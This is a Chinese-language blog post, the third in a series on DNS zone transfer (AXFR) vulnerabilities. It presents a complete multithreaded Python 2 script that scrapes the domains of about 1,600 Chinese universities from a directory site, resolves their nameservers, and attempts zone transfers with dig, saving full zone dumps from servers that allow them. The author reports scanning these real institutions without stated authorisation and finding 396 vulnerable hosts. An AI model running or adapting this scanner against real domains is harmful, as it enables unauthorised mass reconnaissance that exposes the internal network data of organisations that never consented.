DNS域传送漏洞(三)

本篇介绍批量扫描存在DNS域传送漏洞的DNS服务器。

笔者选择了安全性比较差的教育网,共扫描1604所高校,发现漏洞主机396台。

高校的域名可从该页面抓取到:http://ziyuan.eol.cn/college.php?listid=128

#encoding=gbk

import urllib2
import re
import threading
import os

html_doc = urllib2.urlopen('http://ziyuan.eol.cn/college.php?listid=128').read().decode('utf-8')
links = re.findall('href="(list.php\?listid=\d+)', html_doc)    # 地区链接
colleges = []
for link in links:
    html_doc = urllib2.urlopen(u'http://ziyuan.eol.cn/' + link).read().decode('utf-8')
    urls = re.findall('www\.\w+\.edu.\w+', html_doc)
    for url in urls:
        colleges.append(url)
    print '已采集学校主页 %d 个...' % len(colleges)

# 导出学校主页
with open('colleges.txt', 'w') as outFile:
    for college in colleges:
        outFile.write(college + '\n')      


lock = threading.Lock()
c_index = 0
def test_DNS_Servers():
    global c_index
    while True:
        lock.acquire()
        if c_index >= len(colleges):
            lock.release()
            break    # End of list
        domain = colleges[c_index].lstrip('www.')
        c_index += 1
        lock.release()
        cmd_res = os.popen('nslookup -type=ns ' + domain).read()    # fetch DNS Server List
        dns_servers = re.findall('nameserver = ([\w\.]+)', cmd_res)
        for server in dns_servers:
            if len(server) < 5: server += domain
            cmd_res = os.popen(os.getcwd() + '\\BIND9\\dig @%s axfr %s' % (server, domain)).read()
            if cmd_res.find('Transfer failed.') < 0 and \
               cmd_res.find('connection timed out') < 0 and \
               cmd_res.find('XFR size') > 0 :
                lock.acquire()
                print '*' * 10 +  ' Vulnerable dns server found:', server, '*' * 10
                lock.release()
                with open('vulnerable_hosts.txt', 'a') as f:
                    f.write('%s    %s\n' % (server.ljust(30), domain))
                with open('dns\\' + server + '.txt', 'w') as f:
                    f.write(cmd_res)
                     
threads = []
for i in range(10):
    t = threading.Thread(target=test_DNS_Servers)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

print 'All Done!'

请读者注意几个细节:

1) 笔者将windows下的命令行工具dig放在了子目录BIND9下,BIND可前往http://www.isc.org/下载。如果你使用Linux,可把完整路径删除。

2) Os.popen打开一个子程序,并返回它的执行结果。

3) Dig命令执行结果中出现特征字符串“XFR size”,则表明该DNS服务器存在漏洞。

github获取源代码

《DNS域传送漏洞(三)》上有2条评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注